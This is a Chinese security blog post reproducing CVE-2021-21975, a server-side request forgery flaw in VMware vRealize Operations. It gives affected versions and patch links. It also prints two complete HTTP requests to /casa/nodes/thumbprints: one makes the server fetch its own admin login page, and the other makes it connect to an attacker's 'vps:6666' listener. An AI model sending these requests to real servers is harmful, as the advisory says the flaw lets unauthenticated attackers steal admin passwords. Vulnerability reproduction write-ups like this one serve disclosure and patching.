CVE-2021-21975:VMware vRealize SSRF复现
CVE-2021-21975:VMware vRealize SSRF复现
作者:Pet3r@Timeline Sec
本文字数:1027
阅读时长:3~4min
声明:请勿用作违法用途,否则后果自负
0x01 简介
vRealize Operations Manager 提供跨物理、虚拟和云基础架构的智能运维管理以及从应用程序到存储的可见性。使用基本策略的自动化,操作团队实现关键过程的自动化并提高 IT 效率。
0x02 漏洞概述
编号:CVE-2021-21975
此漏洞是vRealize Operations API管理器中的服务器端请求伪造(SSRF)漏洞,该漏洞可能允许未经身份验证的远程攻击者窃取管理密码。VMware将漏洞指定为“重要”严重等级,CVSSv3评分为8.6。
0x03 影响版本
VMware vRealize Operations 8.3.0、8.2.0、8.1.1、8.1.0、7.5.0
VMware Cloud Foundation 4.x、3.x
vRealize Suite Lifecycle Manager 8.x
0x04 环境搭建
漏洞环境下载地址:
https://my.vmware.com/zh/group/vmware/patch#search
访问生成的地址:
https://192.168.3.6
0x05 漏洞复现
验证1:服务端请求登录
POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.3.6
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Client-Data: CKi1yQEIlLbJAQijtskBCMS2yQEIqZ3KAQiOucoBCPjHygEIpM3KAQjc1coBCPDgygEI5JzLAQipncsB
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 36
["127.0.0.1:443/admin/login.action"]
验证2:vps监听
POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.3.6
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Client-Data: CKi1yQEIlLbJAQijtskBCMS2yQEIqZ3KAQiOucoBCPjHygEIpM3KAQjc1coBCPDgygEI5JzLAQipncsB
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 36
["vps:6666"]
0x06 修复方式
建议参考官方公告及时升级或安装相应补丁
下载链接:
https://kb.vmware.com/s/article/83210
参考链接:
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21975
https://www.bleepingcomputer.com/news/security/vmware-fixes-bug-allowing-attackers-to-steal-admin-credentials/
本文分享自 Timeline Sec 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!
腾讯云开发者
